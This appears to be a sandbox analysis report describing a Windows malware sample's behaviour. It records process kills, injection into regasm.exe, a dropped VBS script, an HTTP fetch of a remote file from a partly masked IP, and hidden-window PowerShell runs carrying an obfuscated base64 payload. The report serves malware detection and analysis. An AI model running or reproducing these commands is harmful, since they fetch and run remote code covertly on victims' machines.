Technical Information
Malicious functions
Executes the following
- '<SYSTEM32>\taskkill.exe' /PID 1704 /F
- '<SYSTEM32>\taskkill.exe' /PID 3240 /F
- '<SYSTEM32>\taskkill.exe' /PID 3060 /F
- '<SYSTEM32>\taskkill.exe' /PID 1056 /F
- '<SYSTEM32>\taskkill.exe' /PID 1232 /F
Injects code into
the following system processes:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Terminates or attempts to terminate
the following system processes:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Modifies file system
Creates the following files
- %TEMP%\ixp000.tmp\6929f53681e92.vbs
Deletes following files that it created itself
- %TEMP%\ixp000.tmp\6929f53681e92.vbs
Network activity
Connects to
- '62.##.226.168':80
TCP
HTTP GET requests
- http://62.##.226.168/public_files/ez5plej.txt
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\6929f53681e92.vbs"
Executes the following
- '<SYSTEM32>\cmd.exe' /c 6929f53681e92.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH...
- '<SYSTEM32>\cmd.exe' /c 6929f53681e92.vbs' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH...' (with hidden window)
